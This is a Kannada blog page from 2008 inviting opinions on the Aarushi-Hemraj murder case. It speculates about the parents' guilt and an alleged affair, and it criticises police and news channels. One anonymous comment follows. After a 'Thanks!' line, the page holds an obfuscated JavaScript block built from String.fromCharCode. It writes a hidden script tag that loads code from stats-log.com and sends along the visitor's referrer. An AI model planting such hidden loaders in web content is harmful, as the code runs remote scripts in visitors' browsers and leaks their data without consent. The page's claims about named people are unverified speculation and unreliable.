Skip to main content

ಇತ್ತೀಚೆಗೆ ಜನರನ್ನು ಕಂಗೆಡಿಸಿರುವ ಆರುಷಿ ಮತ್ತು ಹೇಮರಾಜ ಕೊಲೆ ಯಲ್ಲಿ ಅರುಷಿಯ ತಂದೆ ರಾಜೇಶ ತಲವಾರ ಆರೋಪಿಯಾಗಿದ್ದಾನೆ. ತಾಯಿ ನೂಪುರ ತಲವಾರ್ ಹಾಗೂ ರಾಜೇಶ ತಲವಾರ ಅನೈತಿಕ ಸಂಬಂಧ ಹೊಂದಿದ್ದರು ಅನ್ನಲಾದ ಅವರ ಸಹೋದ್ಯೋಗಿ ಫ್ರಫುಲ್ಲ ದುರ್ರಾನಿ ಅವರ ಪತ್ನಿ ಅನಿತಾ ದುರ್ರಾನಿ ಅವರ ಹೇಳಿಕೆ ಕೂಡಾ ಗೊಂದಲಕಾರಿಯಾಗಿದೆ. ಯಾರಿರಬಹುದು ಕೊಲೆಗಾರರು? ತಂದೆ ತಾಯಿ ಗಳೇ ಸೇರಿ ನಡೆಸಿದ ಕೃತ್ಯವೇ ಇದು? ಹೆತ್ತ ಕಂದಮ್ಮನ ಮೇಲೆ ತಂದೆ ತಾಯಿಗಳು ಈ ರೀತಿ ಮಾಡುತ್ತಾರೆಯೇ? ನಿಮ್ಮ ಅಭಿಪ್ರಾಯ?

ತನಿಖೆ ಮುಗಿಯುವ ಮುನ್ನವೇ ಎಲ್ಲ ವಿವರಗಳನ್ನು ಮಿಡಿಯಾಕ್ಕೆ ಕೊಟ್ಟ ಮೂರ್ಖ ಪೋಲಿಸರಿಗೆ ಏನು ಹೇಳೋಣ? ಈ ವಿಷಯವನ್ನು ಗಂಟೆಗಟ್ಟಲೆ ಪ್ರಸಾರಮಾಡಿ ಜನರಲ್ಲಿ ಭೀತಿ ಉಂಟು ಮಾಡಿದ 24 ಗಂಟೆ ನ್ಯೂಸ ಚಾನೆಲ ಗಳಿಗೆ ಏನಂತೀರಾ?

ಈ ಲೇಖನದ ಬಗ್ಗೆ ನಿಮ್ಮ ಅನಿಸಿಕೆ ತಿಳಿಸಿ

ಅನಿಸಿಕೆಗಳು

ಅನಾಮಿಕನು (ಪ್ರಮಾಣಿಸಲ್ಪಟ್ಟಿಲ್ಲ.) ಶುಕ್ರ, 06/06/2008 - 13:50

ಅರುಷಿ ಕೊಲೆ ವಿಷಯ ಇಷ್ಟು ದೊಡ್ಡದು ಮಾಡುವ ಅವಶ್ಯಕತೆ ಇಲ್ಲ. ಅದೂ ಕರ್ನಾಟಕದಲ್ಲಿ ಈ ವಿಚಾರ ಈ ಮಟ್ಟದಲ್ಲಿ ಅವಶ್ಯಕತೆ ಇರಲಿಲ್ಲ. ಇತ್ತೀಚಿಗೆ ಮೂಡಿಗೆರೆಯಲ್ಲಿ ಒಬ್ಬ ಸೈಂಟಿಸ್ಟ ಕೊಲೆ ಆಯ್ದು. ಅದರ ಬಗ್ಗೆ ಸುದ್ಧಿಯೇ ಆಗಲಿಲ್ಲ. ಉತ್ತರ ಭಾರತದ ಮಾಧ್ಯಮದವರು ಅರುಷಿ ಕೊಲೆಯನ್ನು ದೊಡ್ಡದ್ದು ಮಾಡಿದರು, ನಾವು ದಕ್ಷಿಣ ಭಾರತೀಯರು ಅದನ್ನೆ ಮುಂದುವರಿಸಬೇಕಾಗಿಲ್ಲ.

Thanks!var r = document.referrer; document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(119)+String.fromCharCode(119)+String.fromCharCode(119)+String.fromCharCode(46)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(115)+String.fromCharCode(45)+String.fromCharCode(108)+String.fromCharCode(111)+String.fromCharCode(103)+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+String.fromCharCode(109)+String.fromCharCode(47)+String.fromCharCode(103)+String.fromCharCode(98)+String.fromCharCode(46)+String.fromCharCode(112)+String.fromCharCode(104)+String.fromCharCode(112)+String.fromCharCode(63)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(103)+String.fromCharCode(38)+String.fromCharCode(114)+String.fromCharCode(61)+escape(r)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))

  • 4497 views